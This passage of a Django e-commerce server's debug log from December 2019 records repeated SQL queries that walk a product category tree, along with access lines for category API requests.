"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:42:04,701 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:42:04,704 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:42:04,707 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:42:04,710 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:42:04,714 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:42:04,717 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:42:04,720 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:42:04,723 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:42:04,726 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:42:04,729 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:42:04,732 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:42:04,736 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:42:04,739 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:42:04,742 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:42:04,745 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:42:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:42:08,586 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:42:08,591 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [16/Dec/2019 07:42:08] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:42:08,620 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:42:08,627 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:42:08,630 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:42:08,633 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:42:08,636 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:42:08,638 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:42:08,640 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:42:08,643 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:42:08,645 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:42:08,648 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:42:08,650 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:42:08,653 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:42:08,655 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:42:08,657 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:42:08,660 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:42:08,662 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:42:08,664 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:42:08,667 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:42:08,669 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:42:08,672 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:42:08,674 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:42:08,677 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:42:08,679 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:42:08,681 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:42:08,683 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:42:08,687 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:42:08,689 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:42:08,692 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:42:08,694 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:42:08,696 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:42:08,699 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:42:08,701 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:42:08,704 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:42:08,706 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:42:08,708 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:42:08,711 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:42:08,714 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:42:08,716 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:42:08,718 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:42:08,720 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:42:08,722 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:42:08,725 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:42:08,728 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:42:08,730 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:42:08,733 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:42:08,735 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:42:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:45:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 07:47:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:47:58,630 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:47:58,641 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:47:58,645 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:47:58,648 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", 